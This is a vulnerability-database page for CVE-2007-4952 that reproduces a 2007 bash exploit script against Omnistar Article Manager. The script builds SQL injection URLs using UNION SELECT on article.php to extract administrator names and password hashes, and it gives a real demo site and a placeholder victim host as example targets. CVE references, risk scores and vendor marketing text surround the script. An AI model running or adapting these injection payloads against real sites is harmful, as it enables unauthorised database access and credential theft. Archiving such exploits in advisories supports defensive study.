Omnistar Article Manager Software - 'article.php' SQL Injection
| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2007-4952 | 18 Sep 200720:00 | – | cve | |
| CVE-2007-4952 | 18 Sep 200720:00 | – | cvelist | |
| EUVD-2007-4933 | 7 Oct 202500:30 | – | euvd | |
| CVE-2007-4952 | 18 Sep 200720:17 | – | nvd | |
| Sql injection | 18 Sep 200720:17 | – | prion |
#/bin/bash
####################################################################################################################
# #
# Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit #
# #
# Exploit Coded By : Cold z3ro #
# #
# http://Hackteach.org #
# #
# #
# Exploit : /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/* #
# /article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/* #
# #
# Example : http://demo.hostcontroladmin.com/demo_press2/articles/ #
# #
####################################################################################################################
URL=$1;
PATH="$2/";
echo -e "\n";
echo -e "\n";
echo -e "######################################################################################"
echo -e "# Omnistar Article Manager Software (article.php) Remote SQL Injection Exploit #"
echo -e "# Exploit Coded By By : Cold z3ro #"
echo -e "# http://Hackteach.org #"
echo -e "######################################################################################"
if [ "$URL" = "" ]; then
echo -e "\n USAGE: $0 [URL] [NukePath]"
echo -e " Example: $0 www.victim.net NukePath\n"
exit
fi;
if [ $PATH = "/" ]; then PATH=""; fi;
name_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/name,1/**/from/**/user/*";
password_query_url="http://$URL/$PATH""article.php?op=favorite&article_id=4&page_id=-1'/**/union/**/select/**/password,1/**/from/**/user/*";
echo -e "\n";
echo -e "\n";
echo -e "Direct Query URL For Admin name: \n";
echo -e ""$name_query_url"\n";
echo -e "\n";
echo -e "Direct Query URL For Admin Hash:\n";
echo -e ""$password_query_url"\n";
# milw0rm.com [2007-09-16]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Sep 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00952